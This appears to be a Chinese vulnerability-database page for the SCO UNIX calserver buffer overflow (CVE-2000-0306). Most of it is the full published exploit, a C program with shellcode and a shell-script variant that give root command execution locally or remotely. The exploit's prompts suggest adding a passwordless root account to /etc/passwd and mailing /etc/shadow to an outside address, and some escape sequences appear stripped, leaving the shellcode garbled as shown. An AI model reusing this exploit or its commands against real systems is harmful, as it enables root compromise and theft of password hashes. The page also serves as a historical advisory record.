SCO UNIX calserver远程缓冲区溢出漏洞
| 漏洞ID | 1105391 | 漏洞类型 | 未知 |
| 发布时间 | 1998-12-29 | 更新时间 | 2005-05-02 |
CVE编号
|
CVE-2000-0306 |
CNNVD-ID
|
CNNVD-200103-031 |
| 漏洞平台 | SCO | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
SCOUnix是一种商业Unix系统。SCOUnix的calserver实现上存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞获得主机的root用户访问权限。[email protected]为这个漏洞写了一个攻击程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/2353/info
Versions of SCO Unix calserver are vulnerable to a buffer overflow attack which can permit root access to a remote attacker.
*/
#include <stdio.h>
#include <fcntl.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
main(argc, argv)
int argc;
char *argv[];
{
#define calserver_pipe "/usr/lib/scosh/pipes/pdg18e5_0000"
#define start_addr 0x7ffffd80
#define hostnamelen 100
#define portnumberlen 10
#define cmdlen 80
char hostname[hostnamelen],portnumber[portnumberlen],cmd[cmdlen];
char *hn,*pn;
int s;
struct sockaddr_in sin;
struct hostent *hp, *gethostbyname();
char msg[850];
char *msghdr=
"x00x00x00x00" // message length
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"xffxffxffxff"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00" // packet_sz
"x1cx00x00x00" // opcode
"x00x00x00x00"; // maxmsgsz
char codes[]=
{
"xebx7f" //start : jmp cont
"x5d" //geteip: popl %ebp
"x55" // pushl %ebp
"xfex4dx98" // decb 0xffffff98(%ebp)
"xfex4dx9b" // decb 0xffffff9b(%ebp)
"xfex4dxe7" // decb 0xffffffe7(%ebp)
"xfex4dxeb" // decb 0xffffffeb(%ebp)
"xfex4dxec" // decb 0xffffffec(%ebp)
"xfex4dxed" // decb 0xffffffed(%ebp)
"xffx45xef" // incl 0xffffffef(%ebp)
"xfex4dxf4" // decb 0xfffffff4(%ebp)
"xc3" // ret
"/bin/sh" //
"x01" // 0xffffff98(%ebp)
"-c"
"x01" // 0xffffff9b(%ebp)
" "
" "
"x01" // 0xffffffe7(%ebp)
"x8dx05x3bx01x01x01" //execv : leal 0x3b,%eax
"x9axffxffxffxffx07x01" // lcall 0x7,0x0
"xc7xc4xffxffxffxff" //cont : movl $0xXXXX,%esp
"xe8x76xffxffxff" // call geteip
"x33xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x81xc5x9cxffxffxff" // addl $0xffffff9c,%ebp
"x55" // pushl %ebp
"x81xc5xfdxffxffxff" // addl $0xfffffffd,%ebp
"x55" // pushl %ebp
"x81xc5xf8xffxffxff" // addl $0xfffffff8,%ebp
"x55" // pushl %ebp
"x55" // pushl %ebp
"x5b" // pop %ebx
"x8bxec" // movl %esp,%ebp
"x50" // pushl %eax
"x55" // pushl %ebp
"x53" // pushl %ebx
"x50" // pushl %eax
"xebxc6" // jmp execv
};
if (argc<2)
{
printf("Host [local] : ");
gets(hostname);
if (!strlen(hostname)) strcpy(hostname,"local");
hn=hostname;
}
else
hn=argv[1];
if ((argc<3)&&strcmp("local",hn))
{
printf("Port [6373] : ");
gets(portnumber);
if (!strlen(portnumber)) strcpy(portnumber,"6373");
pn=portnumber;
}
else
pn=argv[2];
printf("Type a command (max length=75), for example :n");
printf(""echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"n");
printf(""mail [email protected]</etc/shadow"n");
printf(" <-----------------------------------75");
printf("------------------------------------>n>");
gets(cmd);
memcpy(codes+40,cmd,strlen(cmd));
memset(msg,'x90',600);
memcpy(msg,msghdr,52);
*(unsigned long*) (msg+201)= *(unsigned long*) (codes+131) = start_addr;
memcpy(msg+600,codes,strlen(codes));
if (!strcmp("local",hn))
{
* (unsigned long*) msg = (unsigned long) (600+strlen(codes)-4);
if ((s=open(calserver_pipe,O_WRONLY)) == -1)
{
printf("Error opening calserver pipen");
exit(1);
};
if (write(s,msg,600+strlen(codes)) == -1)
{
printf("Error writing to the calserver pipen");
exit(1);
};
exit(0);
};
hp = gethostbyname(hn);
if (hp == 0)
{
herror("gethostbyname");
exit(1);
}
memcpy(&sin.sin_addr,hp->h_addr,hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(atoi(pn));
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) == -1)
{
perror("connect");
exit(1);
}
if (write(s, msg+12,600-12+strlen(codes)) == -1)
{
perror("write");
exit(1);
}
close(s);
}
*** Shell version ***
#!/bin/sh
#
# ... The punishment for inobedience ...
#
# This is a local/remote buffer overflow exploit for calserver bug
# (SCO OpenServer Enterprise System v 5.0.4p).
# If you have any problems with it, drop me a letter.
# Happy New Year !
#
#
# *** Brief manual ***
#
# Local mode is a default mode for the calendar server. If calserver
# runs on your site in this mode just try to run the exploit with only
# argument "local". If calserver operates on your or other sites in the
# network mode you should use exploit with two arguments: "<sitename>" and
# "<portnumber>". Portnumber is usually equal to 6373 but other values are
# possible. Don't use "localhost" or "127.0.0.1" as a <sitename>. Check
# "/usr/lib/scosh/calargs" file to see the current mode of the calendar
# server.
# Execution of the exploit is similar to a blind execution of the
# following command with root permissions: "/bin/sh -c <command>".
# There are a few limitations for number and length of commands. The
# length of a command should not exceed 75 symbols. The number of
# executable commands depends on calserver configuration and it is equal to
# the number of child calendar servers which are basically 4 by default.
# Therefore running of this exploit must be very effective. You are free
# to use sequences of a shell commands separated by ";" as a <command>.
#
# 9.999,99
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1998. E-mail: [email protected]
#
#
#
calserver_pipe="/usr/lib/scosh/pipes/pdg18e5_0000"
msg="/tmp/msg"
msghdr1=' 2 3 '
msghdr2=' 377 377 377 377 '
' 34 '
codes1=' 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 200 375 377 177 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220'
' 353 177]U 376M 230 376M 233 376M 347 376M 353 376M 354 376M'
' 355 377E 357 376M 364 303/bin/sh 1-c 1'
codes2=' 1 215 5; 1 1 1 232 377 377 377 377 7 1 307 304 200'
' 375 377 177 350v 377 377 3773 300P 201 305 234 377 377 377U'
' 201 305 375 377 377 377U 201 305 370 377 377 377UU[ 213 354'
'PUSP 353 306'
rm -f $msg
if [ _$1 = "_" ]
then
{
echo -n "Host [local] :"
read hostname
if [ _$hostname = "_" ]
then
hostname="local"
fi
}
else
hostname=$1
fi
if [ _$hostname = "_local" ]
then
if [ -p $calserver_pipe ]
then
echo -n $msghdr1>$msg
else
echo "Error opening calserver pipe"
exit 1
fi
else
if [ _$2 = "_" ]
then
{
echo -n "Port [6373] :"
read portnumber
if [ _$portnumber = "_" ]
then
portnumber="6373"
fi
}
else
portnumber=$2
fi
fi
echo "Type a command (max length=75), for example :"
echo '"echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"'
echo '"mail [email protected]</etc/shadow"'
echo -n " <-----------------------------------75"
echo -n "------------------------------------>n>"
read c
echo -n $msghdr2$codes1>>$msg
printf "%75s" "$c">>$msg
echo -n $codes2>>$msg
if [ _$hostname = "_local" ]
then
cat $msg>>$calserver_pipe
else
{
echo -n ' 377 377 377 377'>>$msg
cat $msg|/etc/ttcp -u -t -l762 -p$portnumber $hostname
}
fi
rm $msg
|参考资料
来源:BUGTRAQ
名称:19981229Local/remoteexploitforSCOUNIX.
链接:http://www.securityfocus.com/templates/archive.pike?list=1&date;=1998-12-29&msg;[email protected]
来源:SCO
名称:SB-99.02
链接:ftp://ftp.sco.com/SSE/security_bulletins/SB-99.02a
相关推荐: ArGoSoft Mail Server Multiple GET Requests Denial Of Service Vulnerability
ArGoSoft Mail Server Multiple GET Requests Denial Of Service Vulnerability 漏洞ID 1100110 漏洞类型 Failure to Handle Exceptional Conditi…
正文完
CVE编号
CNNVD-ID